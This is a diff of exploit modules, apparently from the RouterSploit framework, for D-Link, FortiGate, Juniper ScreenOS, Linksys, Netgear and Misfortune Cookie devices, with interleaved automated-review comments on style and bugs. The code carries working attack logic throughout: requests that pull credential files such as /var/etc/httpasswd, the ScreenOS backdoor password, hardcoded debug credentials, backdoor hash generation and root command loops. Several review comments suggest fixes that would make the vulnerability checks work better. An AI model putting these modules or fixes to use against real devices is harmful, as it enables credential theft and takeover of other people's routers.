if '<form name="frm" id="frm" method="post" action="login.php">' not in res:
return True # target vulnerable
return True # target vulnerable
return False # target not vulnerable
import requests
import re
from routersploit import *
from routersploit import (
exploits,
sanitize_url,
print_error,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -13,21 +19,21 @@ class Exploit(exploits.Exploit):
'name': 'D-Link DIR-300 & DIR-600 & DIR-615 Info Disclosure',
'description': 'Module explois information disclosure vulnerability in D-Link DIR-300, DIR-600, DIR-615 devices. It is possible to retrieve sensitive information such as credentials.',
'authors': [
'tytusromekiatomek <tytusromekiatomek[at]inbox.com>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'tytusromekiatomek <tytusromekiatomek[at]inbox.com>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://seclists.org/bugtraq/2013/Dec/11'
],
'targets': [
],
'targets': [
'D-Link DIR-300 (all)',
'D-Link DIR-600 (all)',
'D-Link DIR-615 (fw 4.0)',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
url = sanitize_url("{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(self.target, self.port))
......@@ -52,7 +58,6 @@ class Exploit(exploits.Exploit):
else:
print_error("Credentials could not be found")
def check(self):
url = sanitize_url("{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(self.target, self.port))
......@@ -60,11 +65,10 @@ class Exploit(exploits.Exploit):
r = requests.get(url)
res = r.text
except:
return None # could not be verified
return None # could not be verified
creds = re.findall("<center>\t\t\t\n\t\t\t<table> <tr> <td>\n\t\t\t(.+?)\n\n\t\t\t</td>", res)
if len(creds):
return True # target vulnerable
return True # target vulnerable
return False # target not vulnerable
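Review bot: The bare `except:` around `requests.get(url)` in `check()` survives this PEP 8 cleanup, and it also catches `KeyboardInterrupt` and `SystemExit`, so interrupting a scan is reported as "could not be verified". Narrow it to `except requests.exceptions.RequestException:`, and consider passing `timeout=` to the request so an unresponsive host cannot hang the check. The same pattern is visible in the `check()` methods of the DNS-320L, DWR-932, Linksys WAP54Gv3 and Misfortune Cookie modules in this commit. The `try:` line itself sits outside the visible hunk.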
import requests
from routersploit import *
from routersploit import (
exploits,
sanitize_url,
print_error,
print_success,
print_status,
)
class Exploit(exploits.Exploit):
......@@ -12,8 +18,8 @@ class Exploit(exploits.Exploit):
'name': 'D-LINK DIR-300 & DIR-600 RCE',
'description': 'Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.',
'authors': [
'Michael Messner <devnull[at]s3cur1ty.de>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
'Michael Messner <devnull[at]s3cur1ty.de>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router',
......@@ -22,7 +28,7 @@ class Exploit(exploits.Exploit):
],
'targets': [
'D-Link DIR 300',
'D-Link DIR 600',
'D-Link DIR 600',
]
}
......@@ -30,7 +36,7 @@ class Exploit(exploits.Exploit):
port = exploits.Option(80, 'Target Port')
def run(self):
if self.check() == True:
if self.check() is True:
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
......@@ -72,4 +78,3 @@ class Exploit(exploits.Exploit):
return True
return False
import requests
import re
from routersploit import *
from routersploit import (
exploits,
sanitize_url,
print_error,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -13,19 +19,19 @@ class Exploit(exploits.Exploit):
'name': 'D-Link DIR-645 Password Disclosure',
'description': 'Module exploits D-Link DIR-645 password disclosure vulnerability.',
'authors': [
'Roberto Paleari <roberto[at]greyhats.it>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'Roberto Paleari <roberto[at]greyhats.it>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt'
],
'targets': [
],
'targets': [
'D-Link DIR-645 (Versions < 1.03)',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(8080, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(8080, 'Target port') # default port
def run(self):
# address and parameters
......@@ -57,11 +63,10 @@ class Exploit(exploits.Exploit):
else:
print_error("Credentials could not be found")
def check(self):
# address and parameters
url = sanitize_url("{}:{}/getcfg.php".format(self.target, self.port))
data = {"SERVICES": "DEVICE.ACCOUNT"}
data = {"SERVICES": "DEVICE.ACCOUNT"}
# connection
try:
......@@ -75,7 +80,6 @@ class Exploit(exploits.Exploit):
creds = re.findall(regular, re.sub('\s+', '', res))
if len(creds):
return True # target vulnerable
return True # target vulnerable
return False # target not vulnerable
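Review bot: The pattern in `re.sub('\s+', '', res)` in `check()` is an ordinary string containing `\s`, which works only because Python leaves unrecognised escapes untouched. A style pass should make it a raw string: `re.sub(r'\s+', '', res)`. The `regular` pattern used on the same line is defined outside the visible hunk and should be checked the same way.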
import requests
import re
from routersploit import *
from routersploit import (
exploits,
print_success,
print_status,
print_error,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -13,8 +19,8 @@ class Exploit(exploits.Exploit):
'name': 'D-LINK DNS-320L & DIR-327L RCE',
'description': 'Module exploits D-Link DNS-320L, DNS-327L Remote Code Execution vulnerability which allows executing command on the device.',
'authors': [
'Gergely Eberhardt', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
'Gergely Eberhardt', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://www.search-lab.hu/media/D-Link_Security_advisory_3_0_public.pdf',
......@@ -29,7 +35,7 @@ class Exploit(exploits.Exploit):
port = exploits.Option(80, 'Target Port')
def run(self):
if self.check() == True:
if self.check() is True:
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
......@@ -65,13 +71,10 @@ class Exploit(exploits.Exploit):
try:
r = requests.get(url)
res = r.text
except:
return None
if "9fdbd928b52c1ef61615a6fd2e8b49af" in r:
return True
return False
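Review bot: In `check()` the marker test reads `if "9fdbd928b52c1ef61615a6fd2e8b49af" in r:`, which tests the response object rather than the body text stored in `res` two lines earlier, so `res` is never used. As far as I can tell, membership on a `requests` response compares whole content chunks to the marker, so the method would in practice return False and report a vulnerable device as not vulnerable. The Linksys WAP54Gv3 module in this commit tests the same marker with `in res`; this line should read `if "9fdbd928b52c1ef61615a6fd2e8b49af" in res:`. The start of `check()` lies outside the hunk.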
import requests
import re
from routersploit import *
from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -17,17 +23,17 @@ class Exploit(exploits.Exploit):
'Jose Rodriguez # vulnerability discovery',
'Ivan Sanz # vulnerability discovery',
'Marcin Bury <marcin.bury[at]reverse-shell.com> # routersploit module',
],
],
'references': [
'http://seclists.org/fulldisclosure/2015/May/129'
],
'targets': [
],
'targets': [
'D-Link DSL-2750B EU_1.01',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
url = sanitize_url("{}:{}/hidden_info.html".format(self.target, self.port))
......@@ -50,7 +56,7 @@ class Exploit(exploits.Exploit):
val = re.findall(regexp, res)
if len(val):
creds.append((d,val[0]))
creds.append((d, val[0]))
if len(creds):
print_success("Credentials found!")
......@@ -61,7 +67,6 @@ class Exploit(exploits.Exploit):
else:
print_error("Credentials could not be found")
def check(self):
url = sanitize_url("{}:{}/hidden_info.html".format(self.target, self.port))
......@@ -73,6 +78,5 @@ class Exploit(exploits.Exploit):
if any(map(lambda x: x in res, ["SSID", "PassPhrase"])):
return True # target vulnerable
return False # target not vulnerable
return False # target not vulnerable
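Review bot: In `__info__` the author entries keep their role annotation inside the string literal, e.g. `'Jose Rodriguez # vulnerability discovery'`, so the `#` text becomes part of the author name shown to users. The other modules in this commit write it as a trailing comment; for consistency these should read `'Jose Rodriguez',  # vulnerability discovery`, and likewise for the two lines below. The start of the list is outside the visible hunk.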
import requests
import json
from routersploit import *
from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
print_table,
print_status,
)
class Exploit(exploits.Exploit):
......@@ -13,19 +20,19 @@ class Exploit(exploits.Exploit):
'name': 'D-Link DWR-932 Info Disclosure',
'description': 'Module explois information disclosure vulnerability in D-Link DWR-932 devices. It is possible to retrieve sensitive information such as credentials.',
'authors': [
'Saeed reza Zamanian' # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'Saeed reza Zamanian' # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/39581/',
],
'targets': [
],
'targets': [
'D-Link DWR-932',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
url = sanitize_url("{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703".format(self.target, self.port))
......@@ -58,7 +65,6 @@ class Exploit(exploits.Exploit):
headers = ("Parameter", "Value")
print_table(headers, *rows)
def check(self):
url = sanitize_url("{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703".format(self.target, self.port))
......@@ -67,10 +73,9 @@ class Exploit(exploits.Exploit):
r = requests.get(url)
res = r.text
except:
return None # could not be verified
return None # could not be verified
if 'wifi_AP1_ssid' in res:
return True # target is vulnerable
return True # target is vulnerable
return False # target not vulnerable
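Review bot: The first `'authors'` entry, `'Saeed reza Zamanian' # vulnerability discovery`, has no comma after the string, so Python concatenates it with the next literal and the list ends up with a single element, `'Saeed reza ZamanianMarcin Bury <...>'`. The commit re-indents these lines but keeps the defect; the line should be `'Saeed reza Zamanian',  # vulnerability discovery`. The description on the line above also misspells "exploits" as "explois".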
......@@ -8,7 +8,12 @@ import tty
import sys
from paramiko.py3compat import u
from routersploit import *
from routersploit import (
exploits,
print_success,
print_error,
print_status,
)
class Exploit(exploits.Exploit):
......@@ -20,8 +25,8 @@ class Exploit(exploits.Exploit):
'name': 'FortiGate OS 4.x-5.0.7 Backdoor',
'description': 'Module exploits D-Link DNS-320L, DNS-327L Remote Code Execution vulnerability which allows executing command on the device.',
'authors': [
'operator8203', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
'operator8203', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router',
......@@ -92,7 +97,6 @@ class Exploit(exploits.Exploit):
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
def check(self):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
......@@ -127,4 +131,3 @@ class Exploit(exploits.Exploit):
m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
return [h]
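Review bot: The `__info__` block of this FortiGate module still carries metadata copied from a D-Link module. Its `'description'` describes the D-Link DNS-320L, DNS-327L remote code execution issue, and the visible `'references'` entry is a dlink.com DIR-600 product page. Someone triaging scan results by module description would be misled about what was tested. The description should cover the FortiGate OS 4.x-5.0.7 backdoor named in `'name'`, and the references should point to the corresponding advisory. The rest of the `references` list is outside the visible hunk.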
import paramiko
import telnetlib
import select
import socket
from routersploit import *
from routersploit import (
exploits,
print_success,
print_error,
)
class Exploit(exploits.Exploit):
......@@ -15,19 +17,19 @@ class Exploit(exploits.Exploit):
'name': 'Juniper ScreenOS Backdoor',
'description': 'Module exploits Juniper ScreenOS Authentication Backdoor vulnerability. If the target is is possible to authentiate to the device.',
'authors': [
'hdm', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'hdm', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor',
],
'targets': [
],
'targets': [
'Juniper ScreenOS 6.2.0r15 to 6.2.0r18',
'Juniper ScreenOS 6.3.0r12 to 6.3.0r20',
]
]
}
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
username = "admin"
password = "<<< %s(un='%s') = %u"
......@@ -58,12 +60,12 @@ class Exploit(exploits.Exploit):
tn.write(self.password + "\r\n")
tn.write("\r\n")
(i,obj,res) = tn.expect(["Incorrect", "incorrect"], 5)
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
if i != -1:
return False
else:
if any(map(lambda x: x in res, ["#", "$",">"])):
if any(map(lambda x: x in res, ["#", "$", ">"])):
print_success("Telnet - Successful authentication")
tn.write("\r\n")
tn.interact()
......@@ -71,12 +73,12 @@ class Exploit(exploits.Exploit):
tn.close()
except:
print_error("Connection Error")
return
return
def check(self):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(self.target, 22, timeout=5, username=self.username, password=self.password)
except:
......@@ -92,13 +94,13 @@ class Exploit(exploits.Exploit):
tn.write(self.password + "\r\n")
tn.write("\r\n")
(i,obj,res) = tn.expect(["Incorrect", "incorrect"], 5)
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
tn.close()
if i != -1:
return False
else:
if any(map(lambda x: x in res, ["#", "$",">"])):
if any(map(lambda x: x in res, ["#", "$", ">"])):
tn.close()
return True
tn.close()
......@@ -106,4 +108,3 @@ class Exploit(exploits.Exploit):
return False
return False
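Review bot: In `check()` the telnet session is closed right after `tn.expect(...)` and then closed again before `return True` and once more on the fall-through path. The two later `tn.close()` calls are redundant and can be dropped. A `try`/`finally` with a single `tn.close()` would also cover the exception path, which is not visible in this hunk. The description string also has typos: "If the target is is possible to authentiate".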
import requests
import re
from routersploit import *
from routersploit import (
exploits,
print_success,
print_error,
print_status,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -13,8 +19,8 @@ class Exploit(exploits.Exploit):
'name': 'Linksys WAP54Gv3',
'description': 'Module exploits remote command execution in Linksys WAP54Gv3 devices. Debug interface allows executing root privileged shell commands is available on dedicated web pages on the device.',
'authors': [
'Phil Purviance', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
'Phil Purviance', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://seclists.org/bugtraq/2010/Jun/93',
......@@ -28,7 +34,7 @@ class Exploit(exploits.Exploit):
port = exploits.Option(80, 'Target Port')
def run(self):
if self.check() == True:
if self.check() is True:
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
......@@ -68,10 +74,9 @@ class Exploit(exploits.Exploit):
r = requests.post(url, data=data, auth=("Gemtek", "gemtekswd"))
res = r.text
except:
return None # could not be verified
return None # could not be verified
if "9fdbd928b52c1ef61615a6fd2e8b49af" in res:
return True
return False
import requests
import re
from routersploit import *
from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -12,20 +17,20 @@ class Exploit(exploits.Exploit):
'name': 'Misfortune Cookie',
'description': 'Exploit implementation for Misfortune Cookie Authentication Bypass vulnerability.',
'authors': [
'Check Point <www.checkpoint.com>', # vulnerability discovery
'Jan Trencansky', # proof of concept exploit
'Marcin Bury <marcin.bury@reverse-shell.com>', # routersploit module
],
'Check Point <www.checkpoint.com>', # vulnerability discovery
'Jan Trencansky', # proof of concept exploit
'Marcin Bury <marcin.bury@reverse-shell.com>', # routersploit module
],
'references': [
'http://mis.fortunecook.ie/'
],
'targets': [
],
'targets': [
'multi'
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
......@@ -43,25 +48,22 @@ class Exploit(exploits.Exploit):
'Accept-Encoding': 'gzip, deflate',
'Cache-Control': 'no-cache',
'Cookie': 'C107373883=/omg1337hax'}
try:
r = requests.get(url, headers=headers)
if r.status_code != 404:
return False # not rompage
return False # not rompage
else:
if 'server' in r.headers:
server = r.headers.get('server')
if re.search('RomPager', server) is not None:
if re.search('omg1337hax', r.text) is not None:
return True # device is vulnerable
return True # device is vulnerable
else:
return None # might be still vulnerable but could not be verified
return None # might be still vulnerable but could not be verified
except:
return None # could not be verified
return None # could not be verified
return False # target not vulnerable
import requests
import re
from routersploit import *
from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -13,19 +17,19 @@ class Exploit(exploits.Exploit):
'name': 'Netgear N300 Auth Bypass',
'description': 'Module exploits authentication bypass vulnerability in Netgear N300 devices. It is possible to access administration panel without providing password.',
'authors': [
'Daniel Haake <daniel.haake[at]csnc.de>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'Daniel Haake <daniel.haake[at]csnc.de>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2015-007_Netgear_WNR1000v4_AuthBypass.txt'
],
'targets': [
],
'targets': [
'Netgear N300',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
......@@ -37,11 +41,11 @@ class Exploit(exploits.Exploit):
def check(self):
url = sanitize_url("{}:{}/".format(self.target, self.port))
try:
r = requests.get(url)
except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema, requests.exceptions.ConnectionError):
return None # target could not be verified
return None # target could not be verified
if r.status_code == requests.codes.unauthorized:
url = sanitize_url("{}:{}/BRS_netgear_success.html".format(self.target, self.port))
......@@ -51,4 +55,3 @@ class Exploit(exploits.Exploit):
return True
return False # target not vulnerable
from routersploit import *
from os import listdir
from os.path import isfile, join
import imp
from routersplot import (
exploits,
print_success,
print_error,
print_status,
)
class Exploit(exploits.Exploit):
"""
......@@ -12,20 +18,19 @@ class Exploit(exploits.Exploit):
'name': 'D-Link Scanner',
'description': 'Scanner module for D-Link devices',
'author': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
exploits = []
rootpath = 'routersploit/modules/'
path = 'exploits/dlink/'
# only py exploit files
modules = [f.replace(".py", "") for f in listdir(rootpath+path) if isfile(join(rootpath+path, f)) and f.endswith(".py") and f != "__init__.py"]
modules = [f.replace(".py", "") for f in listdir(rootpath + path) if isfile(join(rootpath + path, f)) and f.endswith(".py") and f != "__init__.py"]
vulns = []
for module_name in modules:
......@@ -47,7 +52,7 @@ class Exploit(exploits.Exploit):
else:
print_status("{} could not be verified".format(f))
print
print
if len(vulns):
print_success("Device is vulnerable!")
for v in vulns:
......@@ -58,4 +63,3 @@ class Exploit(exploits.Exploit):
def check(self):
print_error("Check method is not available")
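Review bot: The new explicit import misspells the package name: `from routersplot import (` should be `from routersploit import (`. If the `import *` line is removed here as in the other modules, the scanner fails with ImportError on load. In `run()`, `exploits = []` also rebinds the imported `exploits` name as a local. That looks harmless from the visible lines, but the list appears unused and could be removed.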
......@@ -122,7 +122,8 @@ class LockedIterator(object):
self.lock = threading.Lock()
self.it = it.__iter__()
def __iter__(self): return self
def __iter__(self):
return self
def next(self):
self.lock.acquire()
......@@ -170,7 +171,7 @@ def print_table(headers, *args, **kwargs):
headers_line = "".join((headers_line, "{header:<{fill}}".format(header=header, fill=current_line_fill)))
headers_separator_line = "".join((
headers_separator_line,
'{:<{}}'.format(header_separator*len(header), current_line_fill)
'{:<{}}'.format(header_separator * len(header), current_line_fill)
))
print()
......